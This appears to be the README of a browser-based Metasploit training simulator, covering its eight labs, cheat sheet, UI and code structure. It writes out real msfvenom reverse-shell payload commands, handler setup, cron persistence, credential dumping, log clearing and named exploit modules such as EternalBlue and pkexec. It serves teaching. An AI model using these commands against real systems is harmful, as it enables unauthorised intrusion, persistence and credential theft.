The Metasploit Simulation Lab is an immersive, terminal-based training environment that teaches ethical hacking methodology through realistic Metasploit Framework simulations. Practice reconnaissance, exploitation, post-exploitation, privilege escalation, and persistence techniques in a completely safe, sandboxed environment β no real systems harmed.
The lab features 8 guided exercises, a dynamic cheat sheet with 40+ commands, a Meterpreter session simulator, and a multi-mode terminal that mimics bash, msfconsole, and meterpreter environments with authentic output.
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β SELECT LAB β GENERATE PAYLOAD β START HANDLER β TRIGGER SHELL β
β β POST-EXPLOIT β PERSISTENCE β COVER TRACKS β COMPLETE β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
| Lab | Title | Difficulty | Time | Objectives |
|---|---|---|---|---|
| 01 | Establishing a Meterpreter Session | π’ EASY | 30 min | 5 |
| 02 | Exploitation Basics | π’ EASY | 30 min | 5 |
| 03 | Privilege Escalation | π‘ MEDIUM | 40 min | 4 |
| 04 | Web Application Attack | π‘ MEDIUM | 30 min | 4 |
| 05 | Fuzzing Test | π’ EASY | 30 min | 2 |
| 06 | Persistence Tactics | π΄ HARD | 40 min | 4 |
| 07 | Full Penetration Test | π΄ HARD | 20 min | 5 |
| 08 | Simulate a Network Breach | π΄ HARD | 30 min | 4 |
| Mode | Prompt | Purpose |
|---|---|---|
| Bash Shell | kali@lab:~$ |
System commands, payload generation, setup |
| msfconsole | msf6 > |
Metasploit framework interaction, exploits |
| Meterpreter | meterpreter > |
Post-exploitation, pivoting, persistence |
| Category | Commands |
|---|---|
| Metasploit | msfconsole, msfvenom, use exploit/multi/handler, set PAYLOAD/LHOST/LPORT, run/exploit |
| Recon | nmap, show exploits/payloads/auxiliary, search, info |
| Exploitation | searchsploit, exploit CVE-2021-41773, use exploit/windows/smb/ms17_010_eternalblue |
| Post-Exploit | getuid, sysinfo, pwd, ls, cat, download, ps, id, whoami |
| Privilege Escalation | sessions -i, background, use post/multi/recon/local_exploit_suggester, sudo su - |
| Persistence | load kiwi, creds_all, migrate, clearev, persistence |
| Web Attacks | sqlmap, setoolkit, curl, auxiliary/scanner/http/sql_injection |
| Evasion | proxychains, cover_tracks, timestomp |
| Database | sudo msfdb init, sudo msfdb reinit, sudo systemctl start postgresql |
- Spawn Meterpreter sessions by triggering payloads
- List active sessions with
sessions -l - Interact with sessions using
sessions -i <id> - Background sessions with
background - Real-time session counter in status bar
- Complete lab steps to increase progress percentage
- Visual progress bar in status panel (0-100%)
- Each lab includes step-by-step guided instructions
- "Run in terminal" buttons auto-fill commands
- Authentic Meterpreter output for
getuid,sysinfo,pwd,ls - Credential harvesting simulation with
load kiwiandcreds_all - Process migration with
migrate <pid> - Cron persistence via
post/linux/manage/cron_persistence - Windows event log clearing simulation
| Payload Type | Command |
|---|---|
| Linux x64 ELF | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell64.elf |
| PHP Reverse Shell | msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o shell.php |
| Encoded Windows Executable (Shikata Ga Nai) | msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -f exe > shell.exe |
- Matrix-green primary color (
#00e536) β classic hacker aesthetic - Three distinct prompt styles for bash, msf, and meterpreter
- Command history navigation with arrow keys (β/β)
- Realistic Metasploit banner on launch
- Click-to-inject commands from cheat sheet and labs
- Tabbed reference panels for payloads, exploits, post-exploit, and web attacks
- Scrollable terminal output with custom scrollbar
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β β β Metasploit Simulation Lab β Ethical Hacking Training v6.3 β
ββββββββββββββββ¬βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β NAVIGATION β ββββββββββββ¬βββββββββββββ¬βββββββββββββ¬βββββββββββββ β
β β² Terminal β β Console β Payloads β Exploits β Post-Exploitβ β
β β° Cheat Sheetβ ββββββββββββ΄βββββββββββββ΄βββββββββββββ΄βββββββββββββ β
β βΆ Labs β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β Sessions β β msf6 > use exploit/multi/handler β β
β β β [*] Using configured payload generic/shell_reverse_tcpβ β
β CONTEXT β β msf6 > set PAYLOAD linux/x64/meterpreter/reverse_tcp β β
β β bash shellβ β PAYLOAD => linux/x64/meterpreter/reverse_tcp β β
β β msf6 consoleβ β msf6 > set LHOST 127.0.0.1 β β
β β meterpreterβ β LHOST => 127.0.0.1 β β
β β β msf6 > run β β
β QUICK CMDS β β [*] Started reverse TCP handler on 127.0.0.1:4444 β β
β msfconsole β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β use handler β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β show exploitsβ β Quick: [msfconsole] [init db] [nmap scan] [gen payload]β β
β show payloadsβ ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β sessions -l β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β getuid β β kali@lab:~$ β β β
β sysinfo β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β help β β
ββββββββββββββββ΄βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β simulation active postgresql: running mode: bash lab progress βββ 45% β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
kali@lab:~$ msfconsole
The Metasploit banner will display with version and module counts. Your prompt changes to msf6 >.
msf6 > show exploits
msf6 > show payloads
msf6 > show auxiliary
View the 2373 exploits, 1396 payloads, and 1232 auxiliary modules simulated.
Click the Labs tab in the sidebar, then expand any lab card. Each lab contains:
- Overview β What you'll learn
- Step-by-step instructions β Commands to run
- Explanation β Why each command matters
- Run in terminal β Auto-fills commands
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell64.elf
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 > set LHOST 127.0.0.1
msf6 > set LPORT 4444
msf6 > run
Open a new terminal (simulated by switching mode or using a lab step) and run:
sudo -u victim /home/victim/shell64.elf
A Meterpreter session opens automatically.
msf6 > sessions -l
msf6 > sessions -i 1
meterpreter > getuid
meterpreter > sysinfo
meterpreter > pwd
meterpreter > ls
meterpreter > cat flag.txt
meterpreter > background
msf6 > use post/linux/manage/cron_persistence
msf6 > set SESSION 1
msf6 > run
Return to the lab interface, mark steps complete, and proceed to the next exercise.
| Module | Type | Description |
|---|---|---|
exploit/windows/smb/ms17_010_eternalblue |
Remote | EternalBlue SMBv3 exploit (Windows) |
exploit/linux/local/dirty_cow |
Local | Dirty COW privilege escalation (Linux) |
exploit/linux/local/pkexec |
Local | CVE-2021-4034 pkexec privilege escalation |
exploit/multi/http/apache_path_traversal |
Web | Apache 2.4.49 path traversal (CVE-2021-41773) |
exploit/multi/http/php_cgi_arg_injection |
Web | PHP CGI argument injection (CVE-2012-1823) |
exploit/multi/http/tomcat_mgr_upload |
Web | Tomcat Manager upload vulnerability |
exploit/windows/local/bypassuac |
Local | Windows UAC bypass |
exploit/windows/smb/psexec |
Lateral | PsExec lateral movement |
| Target Platform | Payload | Command |
|---|---|---|
| Linux x64 | linux/x64/meterpreter/reverse_tcp |
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell.elf |
| Windows x64 | windows/x64/meterpreter/reverse_tcp |
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f exe -o shell.exe |
| PHP | php/meterpreter/reverse_tcp |
msfvenom -p php/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o shell.php |
| Linux x64 (staged) | linux/x64/shell_reverse_tcp |
msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell.elf |
| Command | Purpose | Example Output |
|---|---|---|
getuid |
Show current user | Server username: victim |
sysinfo |
Display system information | OS: Ubuntu 22.04.3 (Linux 6.1.0-kali5-amd64) |
pwd |
Print working directory | /home/victim |
ls |
List files | shell64.elf .bashrc |
cat <file> |
Read file contents | FLAG{meterpreter_lab_complete} |
load kiwi |
Load Mimikatz-like credential module | Loading extension kiwi... Success. |
creds_all |
Dump credentials | Username: victim Hash: $6$simulated$xxxxxxxx |
migrate <pid> |
Move to another process | [*] Migrating from PID 5432 to 1234... |
clearev |
Clear Windows event logs | [!] Clearing event logs... (simulated) |
background |
Background current session | [*] Backgrounding session 1... |
The built-in cheat sheet provides quick reference for:
| Tab | Content |
|---|---|
| Console | Setup & launch commands:msfconsole, sudo msfdb init, nmap, module management |
| Payloads | Payload types (single/stager/staged) and msfvenom generation commands |
| Exploits | Remote, local, client-side, web, and PHP RCE exploit modules |
| Post-Exploit | Privilege escalation, persistence, credential dumping, log clearing, process migration |
| Web/Social | SQL injection, PHP RCE, file upload, SEToolkit phishing simulation |
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Metasploit Simulation Lab Engine β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β Game State (STATE) β β
β β β’ mode (normal/msf/meterp) β β
β β β’ sessCnt (active sessions) β β
β β β’ labProg (training progress) β β
β β β’ curMod (terminal/cheatsheet/labs/sessions) β β
β β β’ curTab (main/payloads/exploits/post/web) β β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β Data Layer β β
β β β’ LABS (8 training exercises) β β
β β β’ CHEAT_SHEET (40+ commands organized in 5 tabs) β β
β β β’ COMMAND_MAP (normal/msf/meterp contexts) β β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β Command Processor β β
β β β’ 40+ simulated commands β β
β β β’ Context-aware routing (bash/msf/meterp) β β
β β β’ Realistic output formatting β β
β β β’ Fallback handler for unknown commands β β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
β β UI Renderer β β
β β β’ Terminal output with color coding β β
β β β’ Lab expansion/collapse β β
β β β’ Session list with interact buttons β β
β β β’ Cheat sheet with click-to-inject β β
β β β’ Progress bar animation β β
β β β’ Command history (β/β navigation) β β
β βββββββββββββββββββββββββββββββββββββββββββββββββββββββ β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
// Core simulation
run() // Execute command from input
handle(result) // Process and display command output
fallback(cmd) // Handle unknown commands with smart guesses
// Mode management
setMode(mode) // Switch between bash/msf/meterpreter
switchMod(mod) // Change sidebar panel (terminal/labs/sessions/cheatsheet)
switchTab(tab) // Change cheat sheet tab
// Session simulation
upSess() // Update session counter and UI
openSess(id) // Interact with session by ID
// Lab system
renderLabs() // Generate lab cards
togLab(id) // Expand/collapse lab
runStep(cmds) // Auto-fill commands from lab steps
// UI helpers
printLine(type, text) // Color-coded terminal output
printPrompt(cmd) // Display prompt + command
scroll() // Auto-scroll terminal
clr() // Clear terminal
inj(cmd) // Inject command into input// Context-aware command execution
var ctx = cmds[mode]; // 'normal', 'msf', or 'meterp'
var fn = ctx[key]; // Look up command in current mode
// Fallback handles:
// - 'set VAR value' β returns 'VAR => value'
// - 'use module' β returns '[*] Module: module'
// - 'info module' β returns '[*] Loading info: module'
// - 'search term' β returns '[*] Searching: term'
// - 'sudo cmd' β returns '[*] Executing with sudo...'| Metric | Value |
|---|---|
| Total Labs | 8 |
| Total Lab Steps | 33 |
| Simulated Commands | 40+ |
| Terminal Modes | 3 (bash, msf, meterpreter) |
| Cheat Sheet Categories | 5 |
| Cheat Sheet Commands | 40+ |
| Exploit Modules | 8+ (simulated) |
| Payload Types | 10+ |
| Post-Exploit Commands | 12+ |
| Browser | Support |
|---|---|
| Chrome | β Full support |
| Firefox | β Full support |
| Safari | β Full support |
| Edge | β Full support |
| Opera | β Full support |
| Mobile Chrome | |
| Mobile Safari |
- Load Time: < 1 second (zero external dependencies)
- Memory Usage: < 30 MB
- CPU Usage: Minimal (event-driven)
- Network: Zero requests after initial load
Metasploit Simulation Lab is a 100% safe educational tool:
- β No actual exploitation or network connections
- β All simulations run locally in your browser
- β No data collection or telemetry
- β No external dependencies or CDN calls
- β Pure HTML/CSS/JavaScript β can run air-gapped
- β For educational purposes only β teaches ethical hacking methodology
β οΈ Disclaimer: This tool is for learning cybersecurity concepts in a controlled, simulated environment. Always obtain proper authorization before testing any system in the real world.
MIT License β see LICENSE file for details.
- Metasploit Framework β Rapid7's legendary penetration testing framework
- Offensive Security β Kali Linux and OSCP certification inspiration
- MITRE ATT&CK β Adversarial tactics, techniques, and procedures
- OWASP β Web application security testing methodology
- Hack The Box / TryHackMe β Gamified cybersecurity training inspiration
- GitHub Issues: Report bugs or request features
- Pull Requests: Welcome for additional labs, commands, or improvements
- Add 5+ advanced labs (buffer overflow, AV evasion, domain pivoting)
- Realistic Metasploit database integration simulation
- Multi-user session persistence across page reloads
- Custom payload builder interface
- Vulnerability scanner simulation (Nessus/OpenVAS)
- Report generation for completed labs
- Achievement system (first session, privilege escalation, etc.)
- Dark mode / light mode toggle
- Sound effects for session opens (optional)
- Progressive difficulty scaling
π‘οΈ Metasploit Simulation Lab β Master Ethical Hacking Methodology π‘οΈ
Learn. Practice. Simulate. Never Exploit Without Permission.
Last updated: June 2026